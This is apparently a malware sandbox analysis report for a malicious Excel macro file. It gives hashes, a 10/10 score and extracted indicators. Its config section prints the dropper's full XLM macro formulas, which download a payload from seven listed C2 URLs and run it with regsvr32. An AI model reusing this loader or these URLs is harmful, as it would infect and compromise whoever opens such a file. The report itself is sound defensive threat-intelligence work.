Overview

overview

10

Static

static

10

eda3427023...2.xlsm

windows7-x64

10

eda3427023...2.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    eda3427023c2e99eee1689a72dc33f3b509adcc3afe0cb036d9a94bf076f63e2

  • Size

    50KB

  • Sample

    241120-qljwvsxmet

  • MD5

    6eb8e6f7e25e1584d15b3b12f073e4df

  • SHA1

    00ad4bbd20750316d331ce2e494c8beceb5f4569

  • SHA256

    eda3427023c2e99eee1689a72dc33f3b509adcc3afe0cb036d9a94bf076f63e2

  • SHA512

    1bc8e8f7db84beb0fe2b8978444c8f3c550daa5fb552259a91eafeaf1479d20b0b1e13290b5453ed890ed426baa66058f70ce21f991e5f2b89339c1e27cb7eb3

  • SSDEEP

    768:Sx9D9onkH+lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA0Zl:SXD9oencDSmSIBlGeuSEcm2h0BZl

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://actividades.laforetlanguages.com/wp-admin/WQNAwrWi77MV8a05fia/

http://consejosdeorlando.com/wp-includes/mMaIlj99Y1C1sYN/

http://aopda.org/wp-content/uploads/KXc3Agu18w/

http://agenciaml.com.br/wp-content/lMGfW5Wk09k/

http://advogadogoiania.com.br/wp-includes/VTz0V6D/

http://101.53.142.76/ApcCache/FiXQvn/

https://www.agenciaigual.com.br/Novo2017/yTZMu9FxcyHYFUkb/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/WQNAwrWi77MV8a05fia/","..\en.ocx",0,0) =IF('DEFGW'!G9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/mMaIlj99Y1C1sYN/","..\en.ocx",0,0)) =IF('DEFGW'!G11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/KXc3Agu18w/","..\en.ocx",0,0)) =IF('DEFGW'!G13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://agenciaml.com.br/wp-content/lMGfW5Wk09k/","..\en.ocx",0,0)) =IF('DEFGW'!G15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/VTz0V6D/","..\en.ocx",0,0)) =IF('DEFGW'!G17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://101.53.142.76/ApcCache/FiXQvn/","..\en.ocx",0,0)) =IF('DEFGW'!G19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.agenciaigual.com.br/Novo2017/yTZMu9FxcyHYFUkb/","..\en.ocx",0,0)) =IF('DEFGW'!G21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\en.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://actividades.laforetlanguages.com/wp-admin/WQNAwrWi77MV8a05fia/
xlm40.dropper

http://consejosdeorlando.com/wp-includes/mMaIlj99Y1C1sYN/
xlm40.dropper

http://aopda.org/wp-content/uploads/KXc3Agu18w/

Targets

    • Target

      eda3427023c2e99eee1689a72dc33f3b509adcc3afe0cb036d9a94bf076f63e2

    • Size

      50KB

    • MD5

      6eb8e6f7e25e1584d15b3b12f073e4df

    • SHA1

      00ad4bbd20750316d331ce2e494c8beceb5f4569

    • SHA256

      eda3427023c2e99eee1689a72dc33f3b509adcc3afe0cb036d9a94bf076f63e2

    • SHA512

      1bc8e8f7db84beb0fe2b8978444c8f3c550daa5fb552259a91eafeaf1479d20b0b1e13290b5453ed890ed426baa66058f70ce21f991e5f2b89339c1e27cb7eb3

    • SSDEEP

      768:Sx9D9onkH+lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA0Zl:SXD9oencDSmSIBlGeuSEcm2h0BZl

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks